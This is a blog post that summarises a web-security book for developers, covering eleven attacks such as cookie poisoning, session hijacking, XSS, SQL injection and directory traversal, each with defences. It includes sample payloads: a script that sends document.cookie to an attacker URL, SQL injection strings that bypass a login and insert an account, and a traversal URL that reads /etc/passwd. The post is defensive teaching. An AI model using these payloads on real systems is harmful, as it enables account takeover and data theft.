Security Tips for Web Development

Anmol Agarwala
Aug 8, 2017 · 12 min read

So I started reading this book, How to Break Web Software, by Mike Andrews and James A. Whittaker. It’s a must read for Web developers, as it explains how one can break into your web application in different ways, hence listing different security measures one should take care of while developing a Web application.

I am listing out few important topics from this book that I feel every developer should know for the security of its application.


The Web vs Client-Server

The WWW is a special case of client-server paradigm. C-S means one or more powerful centralized servers serving resources to thin clients which usually existed within the walls of an organization( hence a protected environment). The clients are often “dumb” which do not do any actual computation and merely provide an interface to the server. Whereas, the Web is a special case using fat-clients operating on protocols like HTTP, HTML, XML, SOAP, etc. It also adds an interesting problem of “untrusted” users as it is for anyone and anywhere. The apps are designed in such a way that more the computation is pushed to the clients, the faster the central server can serve the requests. This means that every input that gets generated at the client must be carefully checked, because the user has access to the code running in the client and all security operations must be performed on the server. Another important thing about the Web is that it is stateless(no information is stored on the server, every request is a new request to the server), so any information that has to be saved from a single Web-session must be stored intermediately somewhere else. Thus it was necessary to concoct an artificial mechanism for managing stateful transactions. That’s why things like cookies and hidden-fields have been widely exploited.

Testing a Web-Server from the viewpoint of Web-client and network is the main challenge of developing a Web-app. The Web-client is all where the important stuff takes place. It’s where your customers as well as your adversaries sit. A malicious user can tamper all the data that’s stored on the web client. Don’t do any important computing or validation on client side without double checking the data on the server. Also the error messages by the server can reveal lots of important information, so be very careful with what message you display.

The lesson to learn is : Trust no client, trust no network and do all important processing on the server.


SOFTWARE TESTING

The purpose of software testing is to find defects and demonstrate the absence of defects. Thus tests that find bugs are good tests because they allow us to reduce the number of latent bugs. Tests that do not find bugs are also good tests because they are the evidence that software performs as specified. The attacks ahead can be used as good set of tests for testing a software.

ATTACK 1 : Knowing and exploring the target

An important part of any testing strategy is gathering as much information as possible. Map the site starting from the start page and subsequently visit different pages. Document the whole flow, also with the parameters that were passed to reach the next page. Web crawlers like (wget, BlackWidow) can help, but doing it manually will make you more efficient. Once the application is mapped visit each page and exploit the source code. Look for any sensitive information present in the source code (comments, hidden input fields, etc. ). You might consider searching string patterns manually using regex. A great tool for help is The Regulator (http://osherove.com/tools ). One can look for :

  • HTML Comments
  • Application Comments
  • IP Addresses
  • E-mail Addresses
  • SQL Queries
  • Database Connection Strings
  • Hidden input fields

After this one can look into the parameters that are passed between pages. You can force the application to generate error messages that might be helpful to an attacker. The classic case of overly helpful error message is the login page. If the application returns one error message for incorrect username and another message for incorrect password, we’ve given our attacker a very useful info.

Developers should be very careful at what comments they right in the code and what error messages they throw. Instead save them to a server-side log file. They are very helpful for debugging and tracing any issues or attacks.

ATTACK 2 : GUESSING FILES AND DIRECTORIES

At the simplest level, Web pages are file son Web Server that anyone can access. Once we have the site-map it easier to see the page naming conventions. For example when the documents are upload they are given sequential numbers. One might access other documents by finding the pattern of the sequential numbers that should be restricted. Control pages can be hidden in two ways, either separate sub-site, as in /admin, /cp, etc. or they can be running on a different port. One can do intelligent guesses or scan all the ports to discover them.

To protect against this attack, first configure the web-server to not serve pages other than those of the application. The following apache server conf. allows requests for PHP pages but deny requests for any other files.

<FilesMatch "!\.(php|php3|php4)$">
Order allow, deny
Deny from all
</FilesMatch>

Another way to restrict access to administrative pages, or section is to password-protect entry to those sections. You can achieve these in various ways (basic, digest and forms-based authentication). Each method has their own potential vulnerabilities but they add an extra level of security.

On an apache server you can create an .htaccess file containing the following text in the directory you want to protect :

AuthName "admin pages"
AuthType Basic
AuthUserFile /path/to/.htpasswd
Require valid-user

Then you need to create a password file by running the htpasswd program. Store the file somewhere that the web-server can access it, but not with the other web documents.

# htpasswd -cm .htpasswd username

Now whenever a user requests a file within the directory where the .htaccess file is located, the browser will ask for a username and password.

You can also configure the web-server to server files only to specific network addresses, or use a firewall to block access to ports except from the internal network limiting the range potential attacks can originate from.

A developer should also analyze the potential vulnerabilities in third-party components being used in the application and make sure the components are updated frequently.

ATTACK 3 : BYPASS INPUT RESTRICTIONS AND VALIDATION ON CLIENT SIDE

In any application, users have to make choices via input fields like forms, text boxes, menus, radio buttons, etc. The attitude of trusting the user interface is what this attack is all about. The user interface sits on a client computer and can be easily bypassed/modified. Users can either change the source code or modify the requests on fly when user submits the form. For example :

<input name="cardnumber" maxlength="16"/>
or,
<SELECT name=1>
<OPTION value=0 selected>0></OPTION>
<OPTION value=1>1</OPTION>
.........
<OPTION value=10>10</OPTION>
</SELECT>

Users can just modify these parameter’s and change the way how the application behaves. In the second case user can modify the input options and select negative values. You wouldn’t want that in your e-commerce site, resulting into a negative amount and ending up paying to the customer. One of the topics that we will be returning to over and over, is that clients cannot be trusted(re-validate on server).

Validating that someone has entered a valid input is difficult to perform with just user interface elements. We can allow the users to enter free-text and perform the validation on server, but that gives us two additional problems. The first problem is performance, as performing a round-trip to the server takes time and bandwidth. The second issue is usability. Users like to be informed of errors they make so that they can correct them and resubmit the input. This is where scripting comes in. Scripting is a easy way to get local error messages to user. Another alternative that users use are hidden fields. The actual validation hidden fields occurs on the server. For example :

<input type="text" name="StartDate" size="16" maxlength="16"><br>
<input type="hidden" name=StartDate_required" value="You must enter a start data.">

An attacker would first discover, whenever client-side validation is being performed by turning off the ability to run scripts in the browser or selectively disable the scripts. On passing invalid inputs, if the server doesn’t throw any error it means he has bypassed the validation.

The main issue that makes this attack successful is trusting the client to do the right thing. Even when you are performing client-side validation, you have to make sure the same validation is being performed on the server.

Validating Input
There are two methods of validating input : white lists and black lists. White-lists are effective lists of acceptable inputs and black-lists are unacceptable inputs. The better way is to use white-lists because in case of black-lists one must know all the wrong inputs. If you miss one that would result into a false negative making the input pass through the validation.

ATTACK 4: COOKIE POISONING

Designers of web never intended cookies to be secure. Cookies are kind of an extension to HTTP to save client-side state. These are small files of textual data written on client hard drive. The Web-application then reuses this data on subsequent visits and remember the visitor. Lots of important information is stored in this cookies like expiration date, session information, etc. All of these info is available for user modification and session hijacking which I will explain in a separate attack. Developers should encrypt the cookie before storing the sensitive data and don’t rely on cookies on expiration date because that can be easily tampered with.

ATTACK 5 : URL JUMPING

Since, the Web is essentially stateless, users can jump to any page by directly by using that page’s URL. Now that’s not what E-commerce site would want, just skip the payment site and go to the checkout page and get a free product. There are lots of other cases where the sequence is very important. To know the sequence developers can use hidden or CGI parameters, cookies or use the HTTP-REFERER field. None of the methods are completely secure as all of them can be modified but still should be used for basic checks at client side itself. Below is a sample http-request header.

GET /articles/news/today.asp HTTP /1.1
Accept: */*
Accept-Language: en-us
Connection: Keep-Alive
Host: localhost
Referer: http://www.myhomepage.com/links.asp
User...........

There is no other secure place to store the last-visited page other than server, but that requires the use of session variables and opens up the possibility of session hijacking attacks. To protect against this consider encrypting the data and keep the keys on the server itself.

Attack 6 : Session Hijacking

Session management helps us to solve a lot of the problems of storing state in a Web Application. The issue is if it’s not implemented correctly, it is open to attack. Servers associate clients with a unique identifier that they use further to maintain their state, which is usually stored in the cookies or sometimes passed as CGI parameters. The attacker objective is to masquerade as another legitimate user by using someone’s else’s session identifier that the he steals from a logged in user. ( The cross-site scripting attack is usually associated with this, sometimes network monitoring also does it).

Session management is very crucial to protect against this attack. One should use cookies to store session values and set the “secure” flag to ensure they are sent over HTTPS only. The way session identifiers are generated should be very random so that no can guess it by mere permutation. Use the HTTP Referer field to identify multiple clients browsing the same site with same ID. Even with these precautions the attacker might steal the cookie through cross-site scripting. So lets discuss about how to protect against cross-site scripting next.

ATTACK 7 : CROSS-SITE SCRIPTING

Cross-site scripting(XSS) means when a malicious user executes a script on another user computer. Now when the user goes to XSS vulnerable website, the malicious script has access to the current page and all the information the browser can access to like cookies and other local resources. The most common place for attackers is comment boxes, reviews, etc. which are presented to other users too. Now users can introduce scripts here which the browser treats differently. Attackers sometime may also present users with scripts embeded into the CGI parameters of the URL and when the user clicks the link the real page is loaded with the script executed.

<script>
document.write("<img src = "URL whose server accessible to attacker?cookie="+ document.cookie">")
</script>

In the above example attacker passes the cookie of the victim’s session as a CGI parameter which he can see from the server’s log for the image url and then can masquerade as the victim user. Attacker can aslo modify the content of sites which people trust and change their opinions. Changing the form’s action attribute can take the user to a URL only where his credentials are logged.

To protect against this attack, filter inputs and only allow data that is legitimate.

ATTACK 8: SQL INJECTION

Many Web-applications often some kind of database: SQL to store information like account records, product info, etc. SQL commands make the interface between web-front end and backend to supply data to the user, but the SQL queries are also generated dynamically using parameters that user supplies via form parameters, CGI params, input boxes, etc. For eg.:

SELECT accountdata FROM accountinfo where accountid = 'accountnumber' AND password = 'apassword'

The above SQL query would generate a legitimate user’s data. But carefully notice that user-supplied data are in those string quotes that a user would type in some field. A user can use the comment operator in SQL( — which is dual dashes) and type the following in the form: Sam’ — leading to following SQL query:

SELECT accountdata FROM accountinfo
where accountid = 'Sam' --'
AND password = 'apassword'

But because the dash operator is a comment, everything that follows is ignored and voila we just pulled account data of some other user.Further let’s say in a login form the following SQL query does the job:

SELECT accountdata FROM accountinfo WHERE accountid
= '' OR 1=1

Because 1=1 always evaluates to true and anything OR’d with true is also true. If the developer is just trying to find out if the above username and password combination exists, we are in. We can also inject our own SQL query like this:

SELECT accountdata FROM accountinfo WHERE accountid = '';
INSERT INTO accountdata (accountid, password) VALUES('mike', '1234') -- ' AND password = ''

To protect against this attack is again filtering from user-input before submitting the queries to the database and the filtering should be done on the server itself rather than on the client. Further it is often seen that the developers use a single database login with lots of database rights( sometimes even the administrator account). Rather separate login accounts should be created with different access levels seeing what each user should be allowed to do. In this case even if an SQL injection occurs, it is confined to the data that it would normally be able to access.

ATTACK 9: DIRECTORY TRAVERSAL

Web pages are just some files that reside on the web server. Its the job of the server to apply restrictions to what files users should have access to. This attack can be applied by changing some CGI parameters in the url which are being used to retrieve some files. Attackers can try traversing directories by using the colon operation( ../) to directories they never should have access to like usernames and passwords stored in the system. If the site allows user to upload files and access it, we should also check that the attacker doesnt uploads executable scripts and execute them by accessing it. Some examples:

http://www.xyz.com/getreport.asp?item=getreport.aspHere the attacker is trying to fetch the source code of the page.http://wwww.xyz.com/getreport.asp?item=../../../etc/passwdHere the attacker is trying to traverse to the directory where usernames and passwords are stored in UNIX systems.

Main ways to protect against this attack is restricting web applications to serve web pages only from its directory or sub-directory. It’s called “root-jailing” the web-directory where the directory looks like the root of the file system. Access Control Lists (ACLs) is another important way to restrict access to what files user has access to and to what actions can be done on those files.

ATTACK 10: BUFFER OVERFLOWS

This is one of the most exploited attacks out there. Buffer overflows occur when a function in a program fails to check the size of the input data that it is processing. What attackers exploit is when the input data overflows into the memory that will be used to choose the next instruction which is the “return address”. The data actually becomes an instruction to the computer, which can allow an attacker to run an arbitrary code on our web-server. This situation is a game-over scenario. To protect against this we should always check the size of input data and allocate to a fixed size memory. Adding a client size check is also good to remove unnecessary bad requests but also add a server-side check for the smart ones.

ATTACK 11: DENIAL OF SERVICE(DoS)

This attack mainly aims at getting the web server down and make it unaccessible to other users. What the attackers do is make the server process large amount of web-requests or long-running operations like search, sql queries etc. so that the server is not able to process other requests. To protect against this attack is pretty difficult at the web-application or server point of view. There are lots of methods available like load balancing the requests at the network level itself, intrusion detection systems prove good in this cases. But there is no one shot solution to this. There has to be a detection and recovery case approach here, where we can detect the attack and stop it from sending more requests.


Some more guidelines are like never use your own cryptography algorithm in your application. Use the ones which have been highly tested and publicly recommended. Use HTTPS wherever the data to be sent to the server is confidential so that the data is encrypted in the network.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade